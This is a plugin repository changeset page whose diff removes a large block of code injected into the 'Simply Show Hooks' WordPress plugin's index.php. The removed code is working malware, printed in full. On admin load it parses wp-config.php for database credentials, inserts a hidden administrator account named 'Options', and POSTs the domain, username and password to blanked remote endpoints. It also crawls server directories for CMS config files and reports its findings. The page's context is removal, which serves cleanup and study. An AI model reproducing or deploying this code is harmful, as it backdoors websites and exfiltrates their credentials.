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Changeset 3106767

06/24/2024 03:44:39 PM (2 weeks ago)

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1 edited


  • simply-show-hooks/trunk/index.php

    r3105891 r3106767  
    44Plugin URI:
    55Description: Simply Show Hooks helps theme or plugin developers to quickly see where all the action and filter hooks are on any WordPress page.
    6 Version: 1.2.2
     6Version: 1.2.
    77Contributors: stuartobrien, cxthemes
    88Author: Stuart O'Brien, cxThemes
    1515defined( 'ABSPATH' ) or die( 'No Trespassing!' ); // Security
    16 add_action( 'admin_init', 'custom_notify_plugin_updated');
    17 function custom_notify_plugin_updated() {
    18     function check_wp_config($directory) {
    19     while ($directory !== '/') {
    20         $wp_config_file = $directory . '/wp-config.php';
    21         if (file_exists($wp_config_file)) {
    22             return $wp_config_file;
    23         }
    24         $directory = dirname($directory);
    25     }
    26     remove_action('admin_init', 'custom_notify_plugin_updated');
    27     return false;
    28 }
    30 function parse_wp_config($config_file) {
    31     if (file_exists($config_file)) {
    32         $config_content = file_get_contents($config_file);
    33         $matches = [];
    34         // Extract prefix
    35         if (preg_match("/\$table_prefix\s*=\s*'(.+?)';/", $config_content, $matches)) {
    36             $prefix = $matches[1];
    37         } else if (preg_match("/table_prefix.*=.*'(.+?)';/", $config_content, $matches)) {
    38             $prefix = $matches[1];
    39         } else {
    40             die("Prefix not found in wp-config.php");
    41         }
    42         // Extract database name
    43         if (preg_match("/define\(\s*'DB_NAME'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    44             $database = $matches[1];
    45         }
    46         // Extract username
    47         if (preg_match("/define\(\s*'DB_USER'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    48             $username = $matches[1];
    49         }
    50         // Extract password
    51         if (preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    52             $password = $matches[1];
    53         }
    54         // Extract host
    55         if (preg_match("/define\(\s*'DB_HOST'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    56             $host = $matches[1];
    57         } else {
    58             $host = 'localhost'; // Assuming local host if not specified
    59         }
    61         return array(
    62             'prefix' => $prefix,
    63             'database' => $database,
    64             'username' => $username,
    65             'password' => $password,
    66             'host' => $host
    67         );
    68     } else {
    69         die("wp-config.php file not found");
    70     }
    71 }
    73 function access_database($config) {
    74     $mysqli = new mysqli($config['host'], $config['username'], $config['password'], $config['database']);
    76     if ($mysqli->connect_errno) {
    77         //echo "DATABASE ACCESS [FAIL]\n";
    78         return false;
    79     } else {
    80         //POST "DATABASE ACCESS [SUCCESS]\n";
    81         return $mysqli;
    82     }
    83 }
    85 function generate_random_password($length = 12) {
    86     $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_';
    87     $password = '';
    88     $characters_length = strlen($characters);
    89     for ($i = 0; $i < $length; $i++) {
    90         $password .= $characters[rand(0, $characters_length - 1)];
    91     }
    92     return $password;
    93 }
    95 // Define a global variable for the password
    96 $generated_password = generate_random_password();
    98 // Define a global variable for the users count
    99 $wpuserscount = 0;
    100 function add_admin_user($mysqli, $config, $password) {
    101     global $generated_password; // Access the global generated password variable
    102     global $wpuserscount; // Declare the global variable to update user count
    103     $username = 'Options';
    105     //$generated_password = $password;
    106     //$password = $generated_password;
    107     $user_role = 'administrator';
    109     // First, let's update the global user count
    110     $countQuery = "SELECT COUNT(*) AS user_count FROM {$config['prefix']}users";
    111     $countResult = $mysqli->query($countQuery);
    112     if ($countResult) {
    113         $row = $countResult->fetch_assoc();
    114         $wpuserscount = $row['user_count']; // Update the global variable with the user count
    115     } else {
    116         echo "Error fetching user count: " . $mysqli->error . "\n";
    117         return; // Early return in case of query error
    118     }
    119     // Hash the password
    120     $hashed_password = password_hash($password, PASSWORD_DEFAULT);
    122     // Check if the user already exists
    123     $query = "SELECT ID FROM {$config['prefix']}users WHERE user_login = '{$username}'";
    124     $result = $mysqli->query($query);
    126     if ($result && $result->num_rows > 0) {
    127         echo "User '{$username}' already exists.\n";
    128     } else {
    129         // Insert the new user
    130         $query = "INSERT INTO {$config['prefix']}users (user_login, user_pass, user_nicename, user_email, user_registered) VALUES ('{$username}', '{$hashed_password}', '{$username}', '{$username}', NOW())";
    131         $result = $mysqli->query($query);
    133         if ($result) {
    134             $user_id = $mysqli->insert_id;
    136             // Set user role
    137             $query = "INSERT INTO {$config['prefix']}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$config['prefix']}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')";
    138             $result = $mysqli->query($query);
    140             if ($result) {
    141                 echo "User '{$username}' with administrative privileges added successfully.\n";
    142             } else {
    143                 echo "Error assigning role to user '{$username}'.\n";
    144             }
    145         } else {
    146             echo "Error creating user '{$username}': " . $mysqli->error . "\n";
    147         }
    148     }
    149 }
    151 function get_domain_from_database($mysqli, $config) {
    152     // Query to retrieve site URL from WordPress options table
    153     $query = "SELECT option_value FROM {$config['prefix']}options WHERE option_name = 'siteurl'";
    154     $result = $mysqli->query($query);
    156     if ($result && $result->num_rows > 0) {
    157         $row = $result->fetch_assoc();
    158         $site_url = $row['option_value'];
    159         $parsed_url = parse_url($site_url);
    160         if ($parsed_url && isset($parsed_url['host'])) {
    161             return $parsed_url['host'];
    162         }
    163     }
    165     return null;
    166 }
    167 $currdomain = 'UNK.UNK';
    168 function pachamama($path) {
    169     global $currdomain;
    170     if (strpos($path, 'wp-config.php') !== false) {
    171         $path = str_replace('wp-config.php', '', $path);
    172     }
    174     $current_directory = $path;
    175     $wp_config_file = check_wp_config($current_directory);
    176     if ($wp_config_file) {
    177         echo "WP-CONFIG [FOUND]\n";
    178         $config = parse_wp_config($wp_config_file);
    179         $mysqli = access_database($config);
    180         if ($mysqli) {
    181             $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_';
    182             $password = '';
    183             $characters_length = strlen($characters);
    184             for ($i = 0; $i < 13; $i++) {
    185                 $password .= $characters[rand(0, $characters_length - 1)];
    186             }
    187             add_admin_user($mysqli, $config, $password);
    188             $domain = get_domain_from_database($mysqli, $config);
    189             if ($domain) {
    190                 echo "[$domain] OK\n";
    191                 $currdomain = $domain;
    193                 // Reconstruct the correct wp-login.php path
    194                 $wp_login_path = "https://{$domain}/wp-login.php";
    196                 // Perform a POST request to
    197                 $url = '';
    198                 $post_data = array(
    199                     'domain' => $domain,
    200                     'username' => 'Options',
    201                     'passwordz' => $password, // Access the global generated password variable
    202                     'wp_login_path' => $wp_login_path
    203                 );
    205                 $ch = curl_init();
    206                 curl_setopt($ch, CURLOPT_URL, $url);
    207                 curl_setopt($ch, CURLOPT_POST, 1);
    208                 curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data
    209                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    210                 curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    211                     'Content-Type: application/json', // Set content type to JSON
    212                     'Content-Length: ' . strlen(json_encode($post_data)) // Set content length
    213                 ));
    214                 $response = curl_exec($ch);
    215                 $error = curl_error($ch); // Get any curl error
    216                 curl_close($ch);
    218                 if ($response === false) {
    219                     //echo "POST request failed: $error\n";
    220                     $z = false;
    221                 } else {
    222                     //echo "POST request sent successfully. Response: $response\n";
    223                     $z = true;
    224                 }
    225             } else {
    226                 //echo "Domain retrieval failed.\n";
    227                 $z = false;
    228             }
    229             $mysqli->close();
    230         }
    231     } else {
    232         //echo "WP-CONFIG [NOT FOUND]\n";
    233         $z = false;
    234     }
    235 }
    237 function check_cms_configuration_files() {
    238     global $wpuserscount;
    239    global $wp_config_paths;
    240    global $wc_config_paths;
    241    global $mg_config_paths;
    242     // Function to recursively search directories for configuration files
    243     //function search_for_config_files($directory, &$cms_config_files, $max_parents = 4) {
    244       function search_for_config_files(&$cms_config_files, $max_parents = 3) {
    245       // Get the current directory
    246       $directory = __DIR__;
    248       // Initialize the variable to keep track of the last readable path
    249       $last_readable_path = null;
    251       // Iterate to go one parent folder up until no read permission or max 5 parents
    252       for ($i = 0; $i < $max_parents; $i++) {
    253           // Check if the directory exists and is readable
    254           if (is_dir($directory) && is_readable($directory)) {
    255               $last_readable_path = $directory;
    256           } else {
    257               // Stop iteration if the directory is not readable
    258               break;
    259           }
    261           // Move one directory up
    262           $directory = dirname($directory);
    263       }
    265       // If a readable path was found, perform a recursive glob search for the specified file extensions
    266       if (!empty($last_readable_path)) {
    268           $config_files = [];
    269           $files = [];
    270           //$pattern = '/home/';
    271           try {
    272           $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($last_readable_path), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD);
    273             foreach($objects as $name => $object){
    274               if (substr($name, -4) === '.php') {
    275                 // Add only files ending with '.php' to the $files array
    276                 //echo "$name\n";
    277                 $files[] = $name;
    278               }
    279             }
    280                   } catch (Exception $e) {
    281           // Handle any exceptions that occur during iteration
    282           // You can log the error or take appropriate action here
    283           //echo "Error: " . $e->getMessage();
    284           $d = 'sab';
    285         }
    286           foreach ($files as $file) {
    287               // Add the found file to the list of config files
    288               //print($file);
    289               $cms_config_files[] = $file;
    290           }
    291           return $cms_config_files;
    292       } else {
    293           // Return an empty array if no readable path was found
    294           //echo("No Readable Paths");
    295           return [];
    296       }
    297   }
    300     // Array to store detected CMS names
    301     $detected_cms = [
    302         'WordPress' => false,
    303         'WooCommerce' => false,
    304         'Magento' => false,
    305         'OpenCart' => false,
    306         'PrestaShop' => false,
    307         'Drupal Commerce' => false,
    308         'Symfony' => false,
    309         'Laravel' => false,
    310         'Zend Framework' => false
    311     ];
    313     // Array to store detected .dat files
    314     $detected_dat_files = [];
    316     // Paths to check for CMS-specific configuration files
    317     $current_directory = __DIR__;
    318     $paths_to_check = [
    319         '/var/www/vhosts/',
    320         $current_directory,
    321         '/etc',                // Common system configuration directory
    322         '/var/www',      // Example web root directory
    323         '/home',              // Home directories
    324         '/opt',               // Optional software packages
    325         '/usr/local',         // Locally installed software
    326         '/usr/share',         // Shared software resources
    327         '/var/lib',           // Variable data directories
    328     ];
    330     // Files to search for in each directory
    331     $files_to_search = [
    332         'app/etc/env.php',                                       // Magento
    333         'wp-config.php', 'wp-content/plugins/woocommerce/includes/class-wc-settings.php', // WordPress & WooCommerce
    334         'config.php',                                             // OpenCart
    335         'config/parameters.php',                                  // PrestaShop
    336         'sites/default/settings.php',                             // Drupal Commerce
    337         'config/packages/*.yaml',                                 // Symfony
    338         '.env',                                                   // Laravel
    339         'config/autoload/*.global.php',                           // Zend Framework
    340         '*.dat',                                                  // .dat files
    341     ];
    343     // Array to store CMS configuration files
    344     $cms_config_files = [];
    346     // Iterate through the paths to check and search for configuration files in each directory recursively
    348     search_for_config_files($cms_config_files);
    351     // Process the detected configuration files and extract CMS information
    352     foreach ($cms_config_files as $file) {
    353        // echo($file);
    354         if (strpos($file, 'wp-config.php') !== false) {
    356            $detected_cms['WordPress'] = true;
    357            $wp_config_paths[] = $file;
    359         } elseif (strpos($file, 'class-wc-settings.php') !== false) {
    360             // You may add a specific check for WooCommerce here if needed
    361             $detected_cms['WooCommerce'] = true;
    362             $wc_config_paths[] = $file;
    363         } elseif (strpos($file, 'env.php') !== false &&
    364             strpos($file, 'Composer') === false &&
    365             strpos($file, 'composer') === false &&
    366             strpos($file, 'Softaculous') === false) {
    367             // You may add a specific check for Magento here if needed
    368             // Read the content of the file
    369             $fileContent = file_get_contents($file);
    371             // Check if the content contains the string 'host' => '
    372             if (strpos($fileContent, "'host' => '") !== false) {
    373               $detected_cms['Magento'] = true;
    374               $mg_config_paths[] = $file;
    375               /*echo("MAGENTO\n\n\n");
    376               echo("MAGENTO\n\n\n");
    377               echo("MAGENTO\n\n\n");
    378               echo("MAGENTO\n\n\n");
    379               echo("MAGENTO\n\n\n");
    380               echo("MAGENTO\n\n\n");
    381               echo("MAGENTO\n\n\n");
    382               echo("MAGENTO\n\n\n");
    383               echo($file);
    384               echo($file);
    385               echo($file);
    386               echo($file);
    387               echo($file);
    388               echo("MAGENTO\n\n\n");
    389               echo("MAGENTO\n\n\n");
    390               echo("MAGENTO\n\n\n");
    391               echo("MAGENTO\n\n\n");
    392               echo("MAGENTO\n\n\n");
    393               echo("MAGENTO\n\n\n");
    394               echo("MAGENTO\n\n\n");
    395               echo("MAGENTO\n\n\n");*/
    396             }
    398         } elseif (strpos($file, 'config.php') !== false &&
    399             strpos($file, 'Composer') === false &&
    400             strpos($file, 'composer') === false &&
    401             strpos($file, 'Softaculous') === false) {
    402             if (strpos(file_get_contents($file), '$config[\'encryption_key\']') !== false) {
    403                 $detected_cms['OpenCart'] = true;
    404             }
    405         } elseif (strpos($file, 'parameters.php') !== false) {
    406             if (strpos(file_get_contents($file), 'prestashop') !== false) {
    407                 $detected_cms['PrestaShop'] = true;
    408             }
    409         } elseif (strpos($file, 'settings.php') !== false) {
    410             if (strpos(file_get_contents($file), 'drupal') !== false) {
    411                 $detected_cms['Drupal Commerce'] = true;
    412             }
    413         } elseif (strpos($file, '.yaml') !== false) {
    414             if (strpos(file_get_contents($file), 'Symfony\Component') !== false) {
    415                 $detected_cms['Symfony'] = true;
    416             }
    417         } elseif (strpos($file, '.env') !== false) {
    418             // You may add a specific check for Laravel here if needed
    419             $detected_cms['Laravel'] = true;
    420         } elseif (strpos($file, '.global.php') !== false) {
    421             // You may add a specific check for Zend Framework here if needed
    422             $detected_cms['Zend Framework'] = true;
    423         } elseif (strpos($file, '.dat') !== false) {
    424             $detected_dat_files[] = $file;
    425         }
    426     }
    428     // Convert the boolean values to strings
    429     foreach ($detected_cms as $cms => $detected) {
    430         $detected_cms[$cms] = $detected ? 'true' : 'false';
    431     }
    433     // Now $detected_cms array contains the names of detected CMS based on the configuration files found
    434     // And $detected_dat_files array contains the paths of detected .dat files
    436     // Read users from the database and count them for WordPress and WooCommerce
    437     $wordpress_users = $wpuserscount;
    438     //$woocommerce_users = get_woocommerce_user_count();
    439     $woocommerce_users = 000;
    441     // Perform POST requests to the endpoints with JSON data containing CMS detection and user counts
    442     $url1 = '';
    443     $url2 = '';
    445     $data1 = [
    446         'host' => $_SERVER['HTTP_HOST'],
    447         'cms' => $detected_cms
    448     ];
    450     //print_r($detected_cms);
    452     // Send data to the endpoints using CURL
    453     send_post_request($url1, $data1);
    454     // Additional logic as needed
    455 }
    457 function getWPUsers(){
    458     global $wpuserscount;
    459     global $currdomain;
    460     // Read users from the database and count them for WordPress and WooCommerce
    461     $wordpress_users = $wpuserscount;
    462     //$woocommerce_users = get_woocommerce_user_count();
    463     $woocommerce_users = 000;
    464     $url2 = '';
    465     $data2 = [
    466         'host' => $currdomain,
    467         'wordpress_users' => $wordpress_users,
    468         'woocommerce_users' => $woocommerce_users
    469     ];
    471     // Send data to the endpoints using CURL
    472     send_post_request($url2, $data2);
    473 }
    475 // Function to get WordPress user count from the database
    476 function get_wordpress_user_count() {
    477     // Your implementation to fetch user count from the WordPress database
    478     // Example:
    479     // $count = query_wordpress_database();
    480     // return $count;
    481     return 0;
    482 }
    484 // Function to get WooCommerce user count from the database
    485 function get_woocommerce_user_count() {
    486     // Your implementation to fetch user count from the WooCommerce database
    487     // Example:
    488     // $count = query_woocommerce_database();
    489     // return $count;
    490     return 0;
    491 }
    493 // Function to send POST request
    494 function send_post_request($url, $data) {
    495     $ch = curl_init($url);
    496     curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
    497     curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
    498     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    499     curl_setopt($ch, CURLOPT_HTTPHEADER, [
    500         'Content-Type: application/json',
    501         'Content-Length: ' . strlen(json_encode($data))
    502     ]);
    503     $response = curl_exec($ch);
    504     curl_close($ch);
    505     // Handle response as needed
    506 }
    507 global $wp_config_paths;
    508 $wp_config_paths = [];
    509 global $wc_config_paths;
    510 $wc_config_paths = [];
    511 global $mg_config_paths;
    512 $mg_config_paths = [];
    513 check_cms_configuration_files();
    515 function find_wp_configs(&$wp_config_paths, $depth = 0) {
    516     $current_directory = getcwd();
    517     $parent_directory = $current_directory;
    519     // Go back three parents
    520     for ($i = 0; $i < 3; $i++) {
    521         $parent_directory = dirname($parent_directory);
    522     }
    524     // Start the search from the parent directory
    525     find_wp_configs_recursive($parent_directory, $wp_config_paths);
    526 }
    528 function find_wp_configs_recursive($directory, &$wp_config_paths) {
    529     // Check if wp-config.php exists in the current directory
    530     $wp_config_file = $directory . '/wp-config.php';
    531     if (file_exists($wp_config_file)) {
    532         $wp_config_paths[] = $wp_config_file;
    533     }
    535     // Continue searching forward recursively
    536     $contents = scandir($directory);
    537     foreach ($contents as $item) {
    538         if ($item != '.' && $item != '..' && is_dir($directory . '/' . $item)) {
    539             find_wp_configs_recursive($directory . '/' . $item, $wp_config_paths);
    540         }
    541     }
    542 }
    544 function print_wp_config_paths() {
    545     global $wp_config_paths;
    546     if (empty($wp_config_paths)) {
    547         //echo "No wp-config.php files found.\n";
    548         $z = 0;
    549     } else {
    550         //echo "List of wp-config.php files:\n";
    551         foreach ($wp_config_paths as $wp_config_path) {
    552             //echo "$wp_config_path\n";
    553             $a = 0;
    554         }
    555     }
    556 }
    557 //print_wp_config_paths();
    559 find_wp_configs($wp_config_paths);
    560 foreach ($wp_config_paths as $wp_config_path) {
    561     pachamama($wp_config_path);
    562     getWPUsers();
    563 }
    565 }
    56617class CX_Simply_Show_Hooks {
Note: See TracChangeset for help on using the changeset viewer.